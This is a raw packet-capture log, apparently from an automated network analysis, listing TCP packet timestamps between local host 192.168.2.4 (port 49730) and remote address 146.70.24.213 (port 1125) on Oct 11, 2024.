                                                                                                                Oct 11, 2024 16:53:46.877473116 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.877476931 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877510071 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877541065 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877551079 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.877573967 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877604961 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877613068 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.877639055 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877671003 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877679110 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.877703905 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877737999 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.877747059 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880193949 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880249023 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880264044 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880300999 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880347967 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880352974 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880382061 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880414963 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880428076 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880446911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880495071 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880500078 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880573988 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880605936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880620956 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880640030 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880671978 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880686998 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880707026 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880753994 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880757093 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880805969 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880834103 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880851030 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880867004 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880903959 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880913019 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.880953074 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.880986929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881000996 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881020069 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881052971 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881066084 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881084919 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881117105 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881129980 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881150007 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881195068 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881198883 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881247044 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881289005 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881295919 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881328106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881361008 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881392002 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881395102 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881428003 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881443024 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881459951 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881505013 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881513119 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881539106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881577015 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881583929 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881674051 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881724119 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881731987 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881763935 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881805897 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881813049 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881844044 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881875992 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881891012 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.881923914 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881954908 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.881968975 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882004976 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882040977 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882050991 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882082939 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882114887 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882116079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882148981 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882153988 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882191896 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882225037 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882239103 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882256985 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882291079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882317066 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882323027 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882355928 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882369041 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882388115 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882420063 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882433891 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882452011 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882484913 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882497072 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882517099 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882549047 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882564068 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882582903 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882616997 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882626057 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882651091 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882702112 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882735014 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882786036 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882818937 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882833004 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882854939 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882872105 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882888079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.882898092 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.882925987 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.883378983 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.883429050 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.883481026 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.883487940 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.883519888 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.883553028 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.883565903 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.883584023 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.883618116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.883631945 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.884742975 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.884784937 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.884793997 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.884891987 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.884924889 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.884957075 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.884963989 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.884989977 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.884999990 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.885023117 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.885067940 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.985606909 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985658884 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985694885 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985780954 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985814095 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985847950 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985871077 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.985871077 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.985883951 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985892057 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.985922098 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985954046 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.985965967 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.985987902 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986048937 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986083984 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986115932 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986165047 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986232996 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986291885 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986339092 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986344099 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986396074 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986428976 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986439943 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986479044 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986510992 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986541986 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986547947 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986573935 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986591101 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986608028 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986643076 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986655951 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986675024 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986706018 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986721992 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986737967 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986776114 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986779928 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.986809015 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986841917 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.986855030 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.989551067 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.989586115 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.989607096 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.989636898 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.989670038 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.989691019 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.989702940 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.989733934 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.989744902 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.989770889 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.989818096 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990319014 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990353107 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990401983 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990406990 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990436077 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990470886 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990487099 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990502119 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990552902 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990597963 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990632057 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990664959 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990679979 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990698099 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990751982 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990763903 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990786076 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990818024 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990837097 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990849972 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990899086 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.990901947 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990955114 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.990991116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991004944 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991024971 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991056919 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991072893 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991153002 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991202116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991203070 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991238117 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991283894 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991288900 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991322994 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991369963 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991373062 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991451979 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991486073 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991503000 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991518974 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991561890 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991569042 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991601944 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991652966 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991683960 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991717100 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991749048 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991765022 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991780996 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991816044 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991828918 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991846085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991878033 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991894007 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991910934 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991944075 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.991960049 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.991976976 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992010117 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992028952 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992043018 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992074966 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992096901 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992108107 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992136955 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992156029 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992168903 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992208004 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992223978 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992247105 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992280006 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992295980 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992314100 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992345095 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992372990 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992405891 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992424965 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992439032 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992470026 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992485046 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992501974 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992532969 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992551088 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.992564917 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992599010 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.992614031 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.998905897 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.998956919 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999006033 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999037981 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999069929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999100924 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999108076 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.999134064 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999151945 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.999180079 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.999316931 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999346018 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999378920 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999404907 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.999448061 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999480963 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999500036 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.999514103 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999545097 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999557972 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:46.999578953 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:46.999622107 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.000514984 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.000566006 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.000597954 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.000631094 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.000695944 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.000727892 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.000761032 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.000770092 CEST497301125192.168.2.4146.70.24.213
